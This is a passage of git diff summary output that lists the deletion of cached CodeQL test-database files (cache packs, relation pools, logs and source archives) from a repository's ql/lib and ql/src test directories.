0 bytes .../db-yaml/default/cache/pages/df.pack | Bin 86 -> 0 bytes .../db-yaml/default/cache/pages/e4.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/e6.pack | Bin 117 -> 0 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/predicates/01.pack | Bin 212 -> 0 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 339 -> 0 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 232 -> 0 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 151 -> 0 bytes .../db-yaml/default/cache/predicates/1f.pack | Bin 210 -> 0 bytes .../db-yaml/default/cache/predicates/20.pack | Bin 220 -> 0 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 537 -> 0 bytes .../db-yaml/default/cache/predicates/25.pack | Bin 214 -> 0 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/28.pack | Bin 423 -> 0 bytes .../db-yaml/default/cache/predicates/2a.pack | Bin 214 -> 0 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 152 -> 0 bytes .../db-yaml/default/cache/predicates/32.pack | Bin 211 -> 0 bytes .../db-yaml/default/cache/predicates/36.pack | Bin 213 -> 0 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 367 -> 0 bytes .../db-yaml/default/cache/predicates/43.pack | Bin 223 -> 0 bytes .../db-yaml/default/cache/predicates/45.pack | Bin 410 -> 0 bytes .../db-yaml/default/cache/predicates/57.pack | Bin 411 -> 0 bytes .../db-yaml/default/cache/predicates/59.pack | Bin 408 -> 0 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 375 -> 0 bytes .../db-yaml/default/cache/predicates/5b.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/5d.pack | Bin 204 -> 0 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 161 -> 0 bytes .../db-yaml/default/cache/predicates/66.pack | Bin 225 -> 0 bytes .../db-yaml/default/cache/predicates/6c.pack | Bin 206 -> 0 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/74.pack | Bin 418 -> 0 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 345 -> 0 bytes .../db-yaml/default/cache/predicates/78.pack | Bin 220 -> 0 bytes .../db-yaml/default/cache/predicates/7b.pack | Bin 210 -> 0 bytes .../db-yaml/default/cache/predicates/7e.pack | Bin 220 -> 0 bytes .../db-yaml/default/cache/predicates/83.pack | Bin 207 -> 0 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 341 -> 0 bytes .../db-yaml/default/cache/predicates/8d.pack | Bin 212 -> 0 bytes .../db-yaml/default/cache/predicates/96.pack | Bin 217 -> 0 bytes .../db-yaml/default/cache/predicates/98.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 336 -> 0 bytes .../db-yaml/default/cache/predicates/9f.pack | Bin 211 -> 0 bytes .../db-yaml/default/cache/predicates/a0.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/a9.pack | Bin 217 -> 0 bytes .../db-yaml/default/cache/predicates/bd.pack | Bin 250 -> 0 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 157 -> 0 bytes .../db-yaml/default/cache/predicates/c9.pack | Bin 219 -> 0 bytes .../db-yaml/default/cache/predicates/ca.pack | Bin 254 -> 0 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 363 -> 0 bytes .../db-yaml/default/cache/predicates/d5.pack | Bin 260 -> 0 bytes .../db-yaml/default/cache/predicates/dc.pack | Bin 212 -> 0 bytes .../db-yaml/default/cache/predicates/de.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/df.pack | Bin 217 -> 0 bytes .../db-yaml/default/cache/predicates/e0.pack | Bin 207 -> 0 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/ef.pack | Bin 221 -> 0 bytes .../db-yaml/default/cache/predicates/f8.pack | Bin 215 -> 0 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 154 -> 0 bytes .../db-yaml/default/cache/predicates/ff.pack | Bin 253 -> 0 bytes .../db-yaml/default/cache/relations/07.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/0d.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/0e.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/10.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/14.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/18.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/19.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/1b.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/28.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 177 -> 0 bytes .../db-yaml/default/cache/relations/39.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/47.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/4d.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/52.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/56.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/59.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/5b.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/5d.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/80.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/85.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/8b.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/aa.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 109 -> 0 bytes .../db-yaml/default/cache/relations/c1.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/cc.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/d0.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/d5.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/da.pack | Bin 126 -> 0 bytes ql/src/test-db/db-yaml/default/cache/version | 1 - .../db-yaml/default/containerparent.rel | Bin 128 -> 0 bytes .../default/containerparent.rel.checksum | Bin 12 -> 0 bytes ql/src/test-db/db-yaml/default/files.rel | Bin 56 -> 0 bytes .../db-yaml/default/files.rel.checksum | Bin 12 -> 0 bytes ql/src/test-db/db-yaml/default/folders.rel | Bin 80 -> 0 bytes .../db-yaml/default/folders.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/locations_default.rel | Bin 7992 -> 0 bytes .../default/locations_default.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/pools/0/buckets/info | Bin 40 -> 0 bytes .../default/pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes ql/src/test-db/db-yaml/default/pools/0/info | Bin 33 -> 0 bytes .../db-yaml/default/pools/0/metadata/info | Bin 40 -> 0 bytes .../default/pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../db-yaml/default/pools/1/buckets/info | Bin 40 -> 0 bytes .../default/pools/1/buckets/page-000000 | Bin 8192 -> 0 bytes .../test-db/db-yaml/default/pools/1/ids1/info | Bin 40 -> 0 bytes .../db-yaml/default/pools/1/ids1/page-000000 | Bin 8192 -> 0 bytes .../db-yaml/default/pools/1/indices1/info | Bin 40 -> 0 bytes .../default/pools/1/indices1/page-000000 | Bin 8192 -> 0 bytes ql/src/test-db/db-yaml/default/pools/1/info | Bin 41 -> 0 bytes .../db-yaml/default/pools/1/metadata/info | Bin 40 -> 0 bytes .../default/pools/1/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/1/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/src/test-db/db-yaml/default/pools/poolInfo | Bin 32 -> 0 bytes .../db-yaml/default/sourceLocationPrefix.rel | Bin 4 -> 0 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 12 -> 0 bytes .../default/strings/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/src/test-db/db-yaml/default/yaml.rel | Bin 7992 -> 0 bytes .../test-db/db-yaml/default/yaml.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/yaml_locations.rel | Bin 2664 -> 0 bytes .../default/yaml_locations.rel.checksum | Bin 12 -> 0 bytes .../test-db/db-yaml/default/yaml_scalars.rel | Bin 3048 -> 0 bytes .../db-yaml/default/yaml_scalars.rel.checksum | Bin 12 -> 0 bytes ql/src/test-db/db-yaml/yaml.dbscheme | 80 ----- ...-diagnostics-add-20240203T091753.298Z.json | 0 ...-diagnostics-add-20240203T091754.191Z.json | 0 .../database-create-20240203.101751.644.log | 281 ------------------ ...tabase-index-files-20240203.101752.962.log | 21 -- ql/src/test-db/src.zip | Bin 3816 -> 0 bytes 411 files changed, 776 deletions(-) delete mode 100644 ql/lib/test-db/baseline-info.json delete mode 100644 ql/lib/test-db/codeql-database.yml delete mode 100644 ql/lib/test-db/db-yaml/default/cache/.lock delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#0#e delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#1#eb delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#1#b delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#2# delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/01.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/02.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/0d.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/15.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/1f.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/1f.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/29.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/2b.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/2d.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/34.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/34.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/37.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/37.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/43.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/54.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/55.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/55.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/9c.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/9c.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/a1.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b4.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b4.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b7.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b9.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/bc.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/bc.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/c0.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/c3.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/e0.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/f3.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/fc.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/02.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/03.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/06.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/09.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/10.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/24.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/26.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/2d.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/2e.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/2f.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/3b.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/3c.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/53.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/5a.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/60.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/6f.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/75.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/7c.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/86.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/99.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/a1.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/a2.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/a8.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/bf.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/c5.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/d2.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/d4.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/e3.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/e4.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/f9.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/06.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/10.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/11.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/19.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/1e.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/2a.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/2f.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/39.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/4b.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/56.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/5c.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/6a.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/7c.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/9f.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/a0.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/ac.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/bf.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/ca.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/d3.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/e9.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/f9.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/version delete mode 100644 ql/lib/test-db/db-yaml/default/containerparent.rel delete mode 100644 ql/lib/test-db/db-yaml/default/containerparent.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/files.rel delete mode 100644 ql/lib/test-db/db-yaml/default/files.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/folders.rel delete mode 100644 ql/lib/test-db/db-yaml/default/folders.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/locations_default.rel delete mode 100644 ql/lib/test-db/db-yaml/default/locations_default.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/buckets/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/buckets/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/metadata/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/metadata/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/pageDump/page-000000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/buckets/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/buckets/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/ids1/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/ids1/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/indices1/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/indices1/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/metadata/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/metadata/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/pageDump/page-000000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/poolInfo delete mode 100644 ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel delete mode 100644 ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/strings/0/buckets/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/strings/0/metadata/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/strings/0/pageDump/page-000000000 delete mode 100644 ql/lib/test-db/db-yaml/default/yaml.rel delete mode 100644 ql/lib/test-db/db-yaml/default/yaml.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/yaml_locations.rel delete mode 100644 ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/yaml_scalars.rel delete mode 100644 ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum delete mode 100755 ql/lib/test-db/db-yaml/yaml.dbscheme delete mode 100644 ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json delete mode 100644 ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json delete mode 100644 ql/lib/test-db/log/database-create-20240203.101754.571.log delete mode 100644 ql/lib/test-db/log/database-index-files-20240203.101755.239.log delete mode 100644 ql/lib/test-db/src.zip delete mode 100644 ql/src/test-db/baseline-info.json delete mode 100644 ql/src/test-db/codeql-database.yml delete mode 100644 ql/src/test-db/db-yaml/default/cache/.lock delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#0#e delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#1#eb delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#1#b delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#2# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-15fd6561 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-15fd6561#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-729b2108 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-729b2108#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-7595a81e delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-7595a81e#0#tttttt delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-7595a81e#1#tt delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-cd159b4d delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-cd159b4d#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d2947120 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d2947120#0#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d8fdd114 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d8fdd114#0# delete mode 100644 